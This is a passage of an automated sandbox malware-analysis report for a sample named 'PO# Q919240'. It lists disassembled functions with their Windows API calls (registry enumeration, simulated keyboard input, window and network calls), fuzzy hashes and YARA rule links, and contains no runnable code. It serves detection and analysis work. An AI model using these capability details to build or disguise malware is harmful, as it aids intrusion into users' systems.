                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                • String ID: X
                • API String ID: 780548581-3081909835
                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                • CloseFigure.GDI32(?), ref: 0044751F
                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                • String ID:
                • API String ID: 4082120231-0
                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                • String ID:
                • API String ID: 2027346449-0
                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetMenu.USER32 ref: 0047A703
                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                • _wcslen.LIBCMT ref: 0047A79E
                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                • String ID:
                • API String ID: 3257027151-0
                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                Download Yara Rule
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastselect
                • String ID:
                • API String ID: 215497628-0
                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 0044443B
                • GetKeyboardState.USER32(?), ref: 00444450
                • SetKeyboardState.USER32(?), ref: 004444A4
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 00444633
                • GetKeyboardState.USER32(?), ref: 00444648
                • SetKeyboardState.USER32(?), ref: 0044469C
                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                • String ID:
                • API String ID: 2354583917-0
                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                Download Yara Rule
                APIs
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageMoveSend
                • String ID:
                • API String ID: 896007046-0
                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                • GetFocus.USER32 ref: 00448ACF
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$FocusMessageSend
                • String ID:
                • API String ID: 3429747543-0
                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                • String ID:
                • API String ID: 3300667738-0
                • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                • __swprintf.LIBCMT ref: 0045D4E9
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume__swprintf
                • String ID: %lu$\VH
                • API String ID: 3164766367-2432546070
                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Msctls_Progress32
                • API String ID: 3850602802-3636473452
                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                • String ID:
                • API String ID: 3985565216-0
                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _malloc.LIBCMT ref: 0041F707
